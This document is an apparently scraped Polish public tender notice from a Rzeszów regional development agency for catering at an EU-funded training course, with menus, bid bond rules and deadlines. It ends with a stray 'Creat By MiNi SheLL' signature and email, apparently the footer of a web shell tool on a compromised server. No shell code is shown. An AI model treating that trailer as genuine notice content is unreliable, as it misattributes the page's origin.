Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 5
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 6
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 7
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 8
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 9
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 10
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 11
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 12
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 13
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 14
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 15
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 16
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 17
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 18
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 19
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 20
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 21
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 22
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 23
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 24
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,


Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 25
AFE/II/....
AFE/II/....	Zupa grzybowa z makaronem 0,25 l,
Filet z ryby smażony w panierce 150 gr., 
frytki 200 gr.,
surówka z czerwonej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 26
AFE/II/....
AFE/II/....	Zupa jarzynowa 0,25 l,
gulasz z mięsa 150 gr., 
kasza gryczana 200 gr., 
ogórki kwaszone 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 27
AFE/II/....
AFE/II/....	Bogracz z mięsem 0,25 l (min. 100 gr. mięsa),
Chleb 150 gr.,
naleśniki z serem i dżemem 3 sztuki,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 28
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,


Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 29
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 30
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 31
AFE/II/....
AFE/II/....	Żurek z gotowanym jajkiem (1 szt.) i kiełbasą (50 gr.) 0,25 l,
kluski śląskie min. 5 szt.,
gulasz 150 gr./min. 100 gr. mięsa,
ćwikła z chrzanem 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 32
AFE/II/....
AFE/II/....	Barszcz czerwony solo 0,25 l,
krokiety z kapustą, mięsem i grzybami 3 szt. (sztuka min. 100 gr.)

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 33
AFE/II/....
AFE/II/....	Zupa pomidorowa z makaronem 0,25 l,
ziemniaki 150 gr., 
kotlet schabowy panierowany 150 gr., 
kapusta zasmażana 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 34
AFE/II/....
AFE/II/....	Zupa ogórkowa z ryżem 0,25 l,
placki po węgiersku z mięsem wołowym 150 gr. placki / 0,15 l sos (min. 100 gr. mięsa), 
surówka z marchewki 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 35
AFE/II/....
AFE/II/....	Zupa pieczarkowa z makaronem 0,25 l,
ziemniaki 150 gr.,
kotlet mielony 150 gr., 
surówka z białej kapusty 150 gr.,

Akademia Funduszy Europejskich/Druga edycja/Miejsce przeprowadzenia szkolenia
Dzień 36
AFE/II/....
AFE/II/....	Rosół z makaronem 0,25 l,
udko z kurczaka opiekane 150 gr. (250 gr. 
z kością),
ziemniaki 150 gr., 
gotowane warzywa 150 gr.,

Sposób podania - obiad dostarczony i wyporcjowany na miejscu przez firmę cateringową. Obiad musi być podany w porcjach na każdą osobę. Niedopuszczalne jest stosowanie naczyń i sztućców jednorazowego użytku. Istnieje również możliwość zapewnienia przez zamawiającego aneksu kuchennego oraz zastawy ceramicznej - 
w zależności od podpisanej umowy na wynajem sali szkoleniowej. Dokładny termin realizacji szkolenia będzie podawany każdorazowo przez zamawiającego na ok. 14 dni datą rozpoczęcia szkolenia.
c) serwis kawowy - 1 przerwa kawowa, przed rozpoczęciem szkolenia. 
Sposób podania - w formie stołu szwedzkiego z zapewnieniem filiżanek, talerzyków, szklanek, łyżeczek i serwetek w czasie trwania szkolenia. 
- ciastka (mieszanka deserowa - delicje, wafelki, ciastka kruche): 5 sztuk różnych ciastek / 1 os., 
- 1 filiżanka kawy rozpuszczalnej 250 ml / 1 os., 
- 1 filiżanka herbaty 250 ml / 1 os.,
- 1 butelka x 0,5 l wody mineralnej niegazowanej / 1 os.,
- 1 butelka x 0,5 l wody mineralnej gazowanej / 1 os.
- Cukier - 4 łyżeczki lub 4 saszetki x 2 gr. / 1 os.,
- mleko - płynne 2% - 50 ml / 1 os.,
- cytryna - 1 plasterek / 1 os.
c) dodatkowe obowiązki wykonawcy: 
- Zapewnienie obsługi kelnerskiej i uporządkowanie pomieszczenia po podanym posiłku, 
- Prowadzenie ciągłego nadzoru nad realizacją zamówienia, 
- Informowanie Zamawiającego na bieżąco o pojawiających się problemach 
w realizacji zamówienia, 
- Dowóz posiłków na miejsce oraz w czasie wskazanym przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6, 55.32.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 1 500,00 zł (słownie: jeden tysiąc pięćset złotych) przed upływem terminu składania ofert. 
 
Wadium wnosi się przed upływem terminu składania ofert!

Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275 z póżn. zm.). 

Dokumenty o których mowa w pkt  b, c, d, e należy w oryginale wpiąć do oferty lub złożyć w sekretariacie (pokój nr 317) RARR SA  Rzeszów ul. Szopena 51  przed upływem terminu składania ofert. 

Wadium wnoszone w pieniądzu musi znaleźć się na rachunku bankowym Zamawiającego przed terminem składania ofert. Za datę wniesienia wadium uważa się datę uznania wskazanego rachunku bankowego, tj. datę faktycznego wpływu środków finansowych na podany rachunek bankowy Zamawiającego.

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Rzeszowskiej Agencji Rozwoju Regionalnego S.A. w Rzeszowie, 35-959 Rzeszów, ul. Szopena 51 w: Raiffeisen Bank Polska S.A. Oddział w Rzeszowie nr konta 04 1750 1224 0000 0000 0115 4362. 

Jeżeli wadium jest wnoszone w pieniądzu prosi się o podanie numeru rachunku bankowego, na który zamawiający ma dokonać zwrot wadium.

W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium wraz z odsetkami.     
Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a ustawy Prawo zamówień publicznych, tj. jeżeli Wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw;
2) w art. 46 ust. 5 ustawy Prawo zamówień publicznych, tj.: jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

Z powyższego dokumentu powinno ponadto wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. 

Wadium  powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 

Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone 
w oryginale.   

Wadium wniesione przez jednego ze wspólników konsorcjum uważa się 
za wniesione prawidłowo.  

Zwrot wadium: Zamawiający zwraca wadium wszystkim Wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z uwzględnieniem postanowień art. 46  ustawy Prawo zamówień publicznych.

Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8.11, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.

Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 usługi polegające na wykonaniu  cateringu dla co najmniej 50 osób każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełneniu warunków określonych w art. 22 ust. 1 Pzp, pełnomocnictwo - jeżeli dotyczy, zakres dla podwykonawców - jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy. Warunki dokonania zmian umowy:
1) Zamawiający przewiduje możliwość zmiany umowy w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy  w tym podatku VAT,
2) Zamawiający przewiduje możliwość zmiany umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie projektu, 
3) zmiany umowy mogą się odbyć pod rygorem nieważności w formie pisemnej za zgodą stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rarr.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rzeszowska Agencja Rozwoju Regionalnego S.A. w Rzeszowie
35-959 Rzeszów, ul. Szopena 51, pok. nr 314..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2011 godzina 10:00, miejsce: Rzeszowska Agencja Rozwoju Regionalnego S.A. w Rzeszowie
35-959 Rzeszów, ul. Szopena 51, pok. nr 317 - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Źródło finansowania: 

Projekt: Akademia funduszy europejskich dla administracji publicznej 
Program: Program Operacyjny Kapitał Ludzki 8.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com